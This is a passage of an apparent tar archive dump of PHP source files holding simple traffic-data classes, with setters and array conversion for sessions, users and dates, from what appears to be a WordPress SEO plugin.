$this->previous_traffic_data = $previous_traffic_data; } /** * Sets the current traffic data. * * @param Traffic_Data $current_traffic_data The current traffic data. * * @return void */ public function set_current_traffic_data( Traffic_Data $current_traffic_data ): void { $this->current_traffic_data = $current_traffic_data; } /** * Sets the previous traffic data. * * @param Traffic_Data $previous_traffic_data The previous traffic data. * * @return void */ public function set_previous_traffic_data( Traffic_Data $previous_traffic_data ): void { $this->previous_traffic_data = $previous_traffic_data; } /** * The array representation of this domain object. * * @return array */ public function to_array(): array { return [ 'current' => $this->current_traffic_data->to_array(), 'previous' => $this->previous_traffic_data->to_array(), ]; } } traffic/traffic-data.php000066600000002331151735516110011230 0ustar00 */ public function to_array(): array { $result = []; if ( $this->sessions !== null ) { $result['sessions'] = $this->sessions; } if ( $this->total_users !== null ) { $result['total_users'] = $this->total_users; } return $result; } /** * Sets the sessions. * * @param int $sessions The sessions. * * @return void */ public function set_sessions( int $sessions ): void { $this->sessions = $sessions; } /** * Sets the total users. * * @param int $total_users The total users. * * @return void */ public function set_total_users( int $total_users ): void { $this->total_users = $total_users; } } traffic/daily-traffic-data.php000066600000002202151735516110012325 0ustar00date = $date; $this->traffic_data = $traffic_data; } /** * The array representation of this domain object. * * @return array */ public function to_array(): array { $result = []; $result['date'] = $this->date; return \array_merge( $result, $this->traffic_data->to_array() ); } } search-console/unexpected-response-exception.php000066600000000774151735516110016177 0ustar00